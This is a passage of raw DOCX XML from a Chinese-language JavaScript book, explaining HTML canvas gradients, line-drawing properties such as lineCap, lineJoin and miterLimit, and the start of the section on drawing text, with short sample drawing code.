            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="72" name="00072.jpeg" descr="000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2.jpeg" descr="00072.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4032849" cy="3950898"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　以图案和渐变进行填充</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要使用渐变色来进行填充或勾勒，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>性（或者</w:t>
      </w:r>
      <w:r>
        <w:t>stroke</w:t>
      </w:r>
      <w:r>
        <w:t>Style</w:t>
      </w:r>
      <w:r>
        <w:t>属性）设置为一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象可以通过调用上下文对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>createLinearGradient()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>createRadialGradient()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来返回。创建渐变色需要通过好几个步骤，同时使用渐变色也要比使用图案更加巧妙。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第一步是要创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>createLinearGradient()</w:t>
      </w:r>
      <w:r>
        <w:t>方法需要的参数是定义一条线段（不一定要水平或者垂直）两个点的坐标，这条线段上每个点的颜色都不同。</w:t>
      </w:r>
      <w:r>
        <w:t>createRadialGradient()</w:t>
      </w:r>
      <w:r>
        <w:t>方法需要的参</w:t>
      </w:r>
      <w:r>
        <w:t>数是两个圆（这两个圆不一定要同心圆，但是一般第二个圆完全包含第一个圆）的圆心和半径。小圆内的区域和大圆外的区域都会用纯色来填充：而两圆之间的区域会用渐变色来填充。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在创建了</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象以及定义了画布中要填充的区域之后，必须通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>addColorStop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来定义渐变色。该方法的第一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个数字，第二个参数是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>颜色值。必须至少调用该方法两次来定义一个简单的颜色渐变，但是可以调用它多次。在</w:t>
      </w:r>
      <w:r>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t>位置的颜色会出现在渐变的起</w:t>
      </w:r>
      <w:r>
        <w:t>始，在</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>位置的颜色会出现在渐变色最后。如果还指定其他的颜色，那么它们会出现在渐变指定的小数位置。其他地方的颜色会进行平滑的过渡。下面是一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个线性渐变，沿着画布的对角线（假设没有进行坐标系变换）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bgfade=c.createLinearGradient(0,0,canvas.width,canvas.height);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bgfade.addColorStop(0.0,"#88f");//</w:t>
      </w:r>
      <w:r>
        <w:t>以左上角为亮蓝色开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bgfade.addColorStop(1.0,"#fff");//</w:t>
      </w:r>
      <w:r>
        <w:t>一直到右下角以白色结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>两个同心圆之间的一种渐变，中间为透明色，然后慢慢变为灰色半透明，最后再回到透明色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var peekhole=c.createRadialGradient(300,300,100,300,300,300);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>peekhole.addColorStop(0.0,"transparent");//</w:t>
      </w:r>
      <w:r>
        <w:t>透明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>peekhole.addColorStop(0.7,"rgba(100,100,100,.9)");//</w:t>
      </w:r>
      <w:r>
        <w:t>灰色半透明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>eekhole.addColorStop(1.0,"rgba(0,0,0,0)");//</w:t>
      </w:r>
      <w:r>
        <w:t>再次透明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于渐变要明白的很重要的一点是：它们并不是与位置相关的。当创建一种渐变的时候，需要指定渐变的范围。如果试图填充渐变指定范围外的区域，会以渐变最后结束的纯色或者另一个渐变色来填充。比如，定义了一种沿着点</w:t>
      </w:r>
      <w:r>
        <w:t>(0,0)</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>(100,100)</w:t>
      </w:r>
      <w:r>
        <w:t>的渐变，那么该渐变只能用于填充在矩形</w:t>
      </w:r>
      <w:r>
        <w:t>(0,0,100,100)</w:t>
      </w:r>
      <w:r>
        <w:t>范围内的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>21-10</w:t>
      </w:r>
      <w:r>
        <w:t>所示的图形是使用如下代码创建的，该代码采用了</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>模式，同时使用到了之前定义过的</w:t>
      </w:r>
      <w:r>
        <w:t>bg</w:t>
      </w:r>
      <w:r>
        <w:t>fade</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>peekhole</w:t>
      </w:r>
      <w:r>
        <w:t>渐变：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillStyle=bgfade;//</w:t>
      </w:r>
      <w:r>
        <w:t>以线性渐变开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillRect(0,0,600,600);//</w:t>
      </w:r>
      <w:r>
        <w:t>填充整个画布</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.strokeStyle=pattern;//</w:t>
      </w:r>
      <w:r>
        <w:t>使用图案来勾勒线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineWidth=100;//</w:t>
      </w:r>
      <w:r>
        <w:t>使用非常宽的线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.strokeRect(100,100,400,400);//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一个大的正方形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillStyle=peekhole;//</w:t>
      </w:r>
      <w:r>
        <w:t>切换到辐射状渐变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillRect(0,0,600,600);//</w:t>
      </w:r>
      <w:r>
        <w:t>使用半透明填充来遮罩画布</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="538" w:name="21_4_8_Xian_Duan_Hui_Zhi_Xiang_Guan_De_S"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>1.4.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　线段绘制相关的属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="538"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>前面已经介绍过了</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它用于指定通过</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>strokeRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法绘制时线段的宽度。除了</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>（当然还有</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>）属性之外，还有其他三个图形属性影响绘制线段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>属性的默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，可以将该属性设置成任意正数，甚至是小于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的小数。（小于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个像素宽的线段会绘制成半透明色的，这样它们就看起来比一个像素宽的线段更暗）。要想完全搞清楚</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>属性，将路径视为是很多无限细的</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>维线条是很重要的。而通过</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>stoke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法绘制的线段或者曲线是处于路径的中间，两边都是</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>宽度的一半。如果勾勒一条闭合的路径并只希望线段出现在路径之外，那么首先勾勒该路径，然后用不透明的颜色填充闭合区域来将出现在路径内的勾勒部分隐藏。又或者如果只希望线段出现在闭合路径内，那么首先调用</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>21.4.10</w:t>
      </w:r>
      <w:r>
        <w:t>节）方法，然后调用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>restore()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>线段宽度是受当前坐标系变换影响的，正如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t>所示，可以通过坐标系变换来对坐标轴进行缩放。如果调用了</w:t>
      </w:r>
      <w:r>
        <w:t>scale(2,</w:t>
      </w:r>
      <w:r>
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:t>方法就会对</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴进行缩放，但是对</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴不产生影响，这样一来，垂直的线</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>段要比原先和它一样宽的水平线段宽一倍。这里很重要的是要搞清楚：当调用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时候，线段宽度是由</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>属性以及当前的坐标系变换决定的，而与</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或者其他用于创建路径的方法无关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另外三个与线段绘制相关的属性影响路径中未连接的端点的外观以及两条路径相交顶点的外观。它们对于很窄的线段的影响很小，相比而言，对于相对较宽的线段的影响很大。如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-11</w:t>
      </w:r>
      <w:r>
        <w:t>所示，它展示了一条细的黑线路径并在周围用灰色区域进行勾勒。该图</w:t>
      </w:r>
      <w:r>
        <w:t>展示了其中两个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3989716" cy="1138686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="73" name="00073.jpeg" descr="000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3.jpeg" descr="00073.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3989716" cy="1138686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>lineCap</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>lineJoin</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lineCap</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了一个未封闭的子路径段的端点如何</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>封顶</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。该属性的默认值</w:t>
      </w:r>
      <w:r>
        <w:t>"butt"</w:t>
      </w:r>
      <w:r>
        <w:t>表示线段端点直接结束。</w:t>
      </w:r>
      <w:r>
        <w:t>"square"</w:t>
      </w:r>
      <w:r>
        <w:t>值则表示在端点的基础上，再继续延长线段宽度一半的长度。</w:t>
      </w:r>
      <w:r>
        <w:t>"round"</w:t>
      </w:r>
      <w:r>
        <w:t>值则表示在端点的基础上延长一个半圆（圆的半径是线段宽度的一半）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>lineJoin</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了子路径顶点之间如何连接。其默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>"miter"</w:t>
      </w:r>
      <w:r>
        <w:t>，表示一直延伸两条路径段的外侧边缘直到在某一点汇合。</w:t>
      </w:r>
      <w:r>
        <w:t>"round"</w:t>
      </w:r>
      <w:r>
        <w:t>值则表示将汇合的顶点变</w:t>
      </w:r>
      <w:r>
        <w:t>得圆润，</w:t>
      </w:r>
      <w:r>
        <w:t>"bevel"</w:t>
      </w:r>
      <w:r>
        <w:t>值则表示用一条直线将汇合的顶点切除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后一个与线段绘制相关的属性是</w:t>
      </w:r>
      <w:r>
        <w:t>miterLimit</w:t>
      </w:r>
      <w:r>
        <w:t>，它只有当</w:t>
      </w:r>
      <w:r>
        <w:t>lineJoin</w:t>
      </w:r>
      <w:r>
        <w:t>属性值是</w:t>
      </w:r>
      <w:r>
        <w:t>"miter"</w:t>
      </w:r>
      <w:r>
        <w:t>才会起作用。当两条线段相交的夹角是锐角的时候，两条线段的斜接部分可以变得很长</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>，并且这些锯齿状的斜接部分在视觉上是分离的。</w:t>
      </w:r>
      <w:r>
        <w:t>miterLimit</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定斜接部分长度的上限。如果指定点上的斜接长度比线段宽度乘以指定的</w:t>
      </w:r>
      <w:r>
        <w:t>miterLimit</w:t>
      </w:r>
      <w:r>
        <w:t>值的一半还要长的话，最终绘制出来的顶点就会是斜切的而不是斜接的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="539" w:name="21_4_9_Wen_Ben_"/>
      <w:r>
        <w:t>21.4.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="539"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要在画布上绘制文本，通常使用</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来使用</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的颜色（渐变或者图案）绘制文本。要想在大字号文本上加特效，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，该方法会在每个字形外边绘制轮廓（图</w:t>
      </w:r>
      <w:r>
        <w:t>21-13</w:t>
      </w:r>
      <w:r>
        <w:t>就是一个带轮廓的文本的例子）。</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法都接受要绘制的文本内容作为第一个参数，以及文本绘制位置的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴坐标和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴坐标作为第二个和第三个参数。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>但是这两个方法都不会对当前路径和当前点产生影响。如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t>所示，文本是会受当前坐标系变换所影响的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fo</w:t>
      </w:r>
      <w:r>
        <w:t>nt</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了绘制文本时候采用的字体。该属性值是一个字符串，语法和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>font</w:t>
      </w:r>
      <w:r>
        <w:t>属性一致。下面是一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"48pt sans-serif"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"bold 18px Times Roman"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"italic 12pt monospaced"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"bolder smaller serif"//</w:t>
      </w:r>
      <w:r>
        <w:t>比＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞的字体更加粗或者更加细</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了文本应当参照</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴坐标（调用</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时候传入的参数）如何进行水平对齐。</w:t>
      </w:r>
      <w:r>
        <w:t>textBaseline</w:t>
      </w:r>
      <w:r>
        <w:t>属性则指定</w:t>
      </w:r>
      <w:r>
        <w:t>了文本应当参照</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴坐标如何进行垂直对齐。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-12</w:t>
      </w:r>
      <w:r>
